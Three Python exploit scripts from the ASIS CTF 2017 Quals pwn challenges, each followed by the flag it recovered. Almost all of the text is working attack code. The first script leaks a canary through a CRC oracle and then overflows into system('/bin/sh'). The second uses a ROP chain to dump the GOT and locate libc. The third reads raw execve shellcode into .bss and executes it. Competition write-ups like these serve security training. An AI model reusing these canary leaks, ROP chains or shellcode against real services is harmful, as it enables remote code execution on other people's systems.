ASIS CTF 2017 Quals — exploit scripts for three pwn challenges (one script per challenge, each followed by the flag it recovered)
#! python3
from ctflib import Pwn
from ctflib.util import *
from binascii import crc32
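def crc32_byte_table():
    """Return a dict mapping crc32(single byte) -> byte value for all 256 bytes.

    CRC32 is injective on one-byte inputs, so each oracle answer for a single
    byte maps back to exactly one value; inverting becomes a dict lookup
    instead of a 256-iteration brute force per leaked byte.
    """
    return {crc32(bytes([b])): b for b in range(0x100)}


def invert_byte_crcs(crcs, table=None):
    """Turn a sequence of single-byte CRC32 answers back into the bytes.

    `crcs` holds the oracle's answers for consecutive addresses, lowest
    address first; the result keeps that order.  Raises ValueError when an
    answer is not the CRC32 of any single byte (the oracle returned something
    other than a 1-byte CRC) instead of silently dropping that byte, which is
    what the original linear search did -- it then produced a wrong value
    without any indication.
    """
    if table is None:
        table = crc32_byte_table()
    out = bytearray()
    for crc in crcs:
        try:
            out.append(table[crc])
        except KeyError:
            raise ValueError('no single byte has CRC32 {:#010x}'.format(crc)) from None
    return bytes(out)


def exploit(cn):
    """Leak the stack canary and a libc pointer through the service's CRC
    oracle, then overflow into a ret2libc system("/bin/sh") frame.

    `cn` is a connected ctflib.Pwn channel.  Addresses below are for the
    32-bit, non-PIE challenge binary and the libc the remote ran at the time;
    they have to be updated for any other build.  Ends in cn.interact().
    """
    crc_to_byte = crc32_byte_table()

    def menu():
        # Consume output up to the main-menu prompt.
        return cn.read_until(b'Choice: ')

    def get_crc(addr, size):
        """Menu option 1: request the CRC of `size` bytes.

        The data prompt is answered with 100 filler bytes followed by `addr`;
        the over-long line presumably overwrites the pointer the service
        checksums, so the answer is the CRC of the bytes at `addr` -- TODO
        confirm against the binary.  Returns the raw hex text printed after
        'CRC is: ' (e.g. b'0x1234abcd').
        """
        cn.send(b'1\n')
        cn.read_until(b'data: ')
        cn.send(str(size).encode() + b'\n')
        cn.send(b'A' * 100 + pI(addr) + b'\n')
        cn.read_until(b'CRC is: ')
        return cn.read_until(b'\n')[:-1]

    def leak(addr):
        """Read the dword at `addr` one byte at a time via the oracle and
        return it as a little-endian integer.  Raises ValueError if any
        answer cannot be inverted (see invert_byte_crcs)."""
        answers = []
        for off in range(4):
            menu()
            answers.append(int(get_crc(addr + off, 1)[2:], 16))
        return int.from_bytes(invert_byte_crcs(answers, crc_to_byte), 'little')

    got_gets = 0x08049fdc          # GOT slot of gets(): holds a libc pointer once resolved
    libc_gets_offset = 0x5e890
    libc_system_offset = 0x0003a940
    libc_binsh_offset = 0x158e8b
    bss_slot = 0x0804a040          # .bss dword whose value is a stack address (printed as 'stack')

    stack = leak(bss_slot)
    print('stack : {}'.format(hex(stack)))
    # The canary sits at a fixed offset from that stack value; the offset was
    # presumably found by debugging the binary.
    canary = leak(stack - 0x40 + 0x0c)
    print('canary : {}'.format(hex(canary)))
    libc_gets = leak(got_gets)
    libc_base = libc_gets - libc_gets_offset
    libc_system = libc_base + libc_system_offset
    libc_binsh = libc_base + libc_binsh_offset
    print('libc base : {}'.format(hex(libc_base)))

    # x86-32 ret2libc frame: filler up to the canary, the leaked canary, three
    # dwords that presumably land in saved registers (value irrelevant), then
    # system() as the return address, a dummy return address for system, and
    # the "/bin/sh" pointer as its single argument.
    payload = b''.join([
        b'A' * 0x28,
        pI(canary),
        pI(0xdeadbeef) * 3,
        pI(libc_system),
        pI(0xdeadbeef),
        pI(libc_binsh),
    ])
    menu()
    input('attach')                # pause so a debugger can attach to a local instance
    cn.send(payload + b'\n')
    cn.interact()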
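def main(host='69.90.132.40', port=4002):
    """Connect to the challenge service and run the exploit.

    The defaults are the competition server recorded in the original script
    (ASIS CTF 2017 Quals; presumably no longer live).  Pass host='localhost'
    to target a local instance instead of editing the source.
    """
    cn = Pwn()
    cn.connect(host, port)
    exploit(cn)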
# Script entry point; nothing runs when the file is imported.
if __name__ == '__main__':
    main()
"""
ASIS{db17755326b5df9dab92e18e43c3ee51}
"""
#! python3
from ctflib import Pwn
from ctflib.util import *
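def canary_from_bytes(high_to_low):
    """Assemble the 8-byte stack canary from its seven leaked upper bytes.

    `high_to_low` holds what the service printed for canary bytes 7..1, most
    significant first, as decimal text (bytes/str, trailing newline allowed)
    or ints.  Each value is masked to 8 bits, so a service that prints the
    bytes as signed chars still yields the right octet.  The lowest byte is
    fixed to 0x00 as in the original script (glibc's x86-64 canary keeps a
    NUL there).  Raises ValueError unless exactly seven values are given.
    """
    octets = [int(v) & 0xff for v in high_to_low]
    if len(octets) != 7:
        raise ValueError('expected 7 canary bytes, got {}'.format(len(octets)))
    return int.from_bytes(bytes(octets + [0x00]), 'big')


def exploit(cn):
    """Leak the canary byte-wise through the 'want to get?' index read, dump
    the GOT with a write() ROP chain to locate libc, then overflow a second
    time into system("/bin/sh").

    `cn` is a connected ctflib.Pwn channel.  Gadget addresses are for the
    non-PIE 64-bit challenge binary; libc offsets are for the libc the remote
    ran at the time.  Ends in cn.interact().
    """
    pop_rsi_r15_ret = 0x400f61
    pop_rdi_ret = 0x400f63
    pop_rax_rdi_ret = 0x400f8c
    syscall_ret = 0x400f8f
    mov_edx_ret = 0x400f89        # presumably copies esi into edx; used to set write()'s length
    libc_printf_offset = 0x00055800
    libc_system_offset = 0x00045390
    libc_binsh_offset = 0x0018c177
    got_printf = 0x602018
    leak_src = got_printf - 0x18 - 0x10   # dump starts 0x28 bytes before printf's GOT slot
    leak_len = 0x50
    printf_off = got_printf - leak_src    # position of printf's slot inside the dump

    def read_value(idx):
        """Answer the 'want to get?' prompt with `idx`.

        For a non-zero index the service prints 'Your value = N'; that line
        (bytes, newline included) is returned.  Index 0 takes the path that
        leads to the comment prompt and returns None.
        """
        cn.read_until(b'want to get?\n')
        cn.send(str(idx).encode() + b'\n')
        if idx == 0:
            return None
        cn.read_until(b'Your value = ')
        return cn.read_until(b'\n')

    # Indices 7..1 return the canary's upper bytes one at a time.
    canary = canary_from_bytes([read_value(i) for i in range(7, 0, -1)])
    print('canary : {}'.format(hex(canary)))
    input('attach?')              # pause so a debugger can attach to a local instance

    def frame(saved_rbp):
        # Buffer filler, 8 bytes of padding, the leaked canary, saved rbp.
        return b'A' * 1024 + b'B' * 8 + pQ(canary) + pQ(saved_rbp)

    # Stage 1: write(1, leak_src, leak_len) through a raw syscall, then a sled
    # of pop rdi; ret that the original author notes lands back in _start so
    # the service accepts a second comment.
    stage1 = frame(0x4141414141414141) + b''.join([
        pQ(pop_rax_rdi_ret), pQ(1), pQ(1),            # rax = SYS_write, rdi = stdout
        pQ(pop_rsi_r15_ret), pQ(leak_len), pQ(leak_len),
        pQ(mov_edx_ret),                              # presumably rdx = leak_len
        pQ(pop_rsi_r15_ret), pQ(leak_src), pQ(leak_src),
        pQ(syscall_ret),
        pQ(pop_rdi_ret) * 9,
    ])
    read_value(0)
    cn.read_until(b'comment:')
    cn.send(stage1 + b'\n')
    cn.recv(1024)                 # drain the output that precedes the dump, as the original did
    buf = cn.recv(128)
    # Fail loudly on a short read instead of letting upQ choke on a truncated slice.
    if len(buf) < printf_off + 8:
        raise RuntimeError('short GOT dump: got {} bytes, need at least {}'.format(len(buf), printf_off + 8))
    libc_printf = upQ(buf[printf_off:printf_off + 8])
    # The next two qwords of the dump are further GOT entries (the original
    # read them as setvbuf and __libc_start_main but never used them).
    libc_base = libc_printf - libc_printf_offset
    libc_system = libc_base + libc_system_offset
    libc_binsh = libc_base + libc_binsh_offset
    print('libc_base : {}'.format(hex(libc_base)))
    print('libc_system : {}'.format(hex(libc_system)))
    print('libc_binsh : {}'.format(hex(libc_binsh)))

    # Stage 2: system("/bin/sh") with rdi set by pop rdi; ret.
    stage2 = frame(0xdeadbeef) + pQ(pop_rdi_ret) + pQ(libc_binsh) + pQ(libc_system)
    read_value(0)
    cn.read_until(b'comment:')
    cn.send(stage2 + b'\n')
    cn.interact()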
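def main(host='69.90.132.40', port=4000):
    """Connect to the challenge service and run the exploit.

    The defaults are the competition server recorded in the original script
    (ASIS CTF 2017 Quals; presumably no longer live).  Pass host='localhost'
    to target a local instance instead of editing the source.
    """
    cn = Pwn()
    cn.connect(host, port)
    exploit(cn)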
# Script entry point; nothing runs when the file is imported.
if __name__ == '__main__':
    main()
"""
ASIS{e77c4a76d8079b330e7e78e8e3f434c4}
"""
#! python3
from ctflib import Pwn
from ctflib.util import *
import time
def exploit(cn):
    """Overflow the stack (24 bytes of filler reach the saved return address)
    into a short ROP chain that calls read() into the .bss, then return into
    the bytes just read -- the flag name ('execstack') hints that region is
    executable.

    `cn` is a connected ctflib.Pwn channel.  Ends in cn.interact().
    """
    plt_read = 0x400400      # read@plt in the non-PIE binary
    bss_buf = 0x601000       # scratch area in .bss that receives the shellcode

    # 0x4005c1 presumably pops two registers before returning, leaving rsi =
    # bss_buf for read() -- TODO confirm the gadget in the binary.
    chain = b''.join([
        b'A' * 24,
        pQ(0x4005c1),
        pQ(bss_buf),
        pQ(0),
        pQ(plt_read),
        pQ(bss_buf),         # after read() returns, execute what it just read
    ])
    input('aaa')             # pause so a debugger can attach to a local instance
    cn.send(chain + b'\n')
    time.sleep(1)            # let the service reach read() before the next send

    # 0x20-byte NOP sled, then the classic 27-byte x86-64 execve("/bin/sh")
    # shellcode: pushes the negated "/bin/sh\0" literal, builds rdi/rsi from
    # rsp, zeroes rdx via cdq, and issues syscall 0x3b.
    shellcode = b'\x90' * 0x20
    shellcode += (b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff'
                  b'\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05')
    cn.send(shellcode + b'\n')
    cn.interact()
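def main(host='139.59.114.220', port=10001):
    """Connect to the challenge service and run the exploit.

    The defaults are the competition server recorded in the original script
    (ASIS CTF 2017 Quals; presumably no longer live).  Pass host='localhost'
    to target a local instance instead of editing the source.
    """
    cn = Pwn()
    cn.connect(host, port)
    exploit(cn)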
# Script entry point; nothing runs when the file is imported.
if __name__ == '__main__':
    main()
"""
ASIS{y0_execstack_saves_my_l1f3}
"""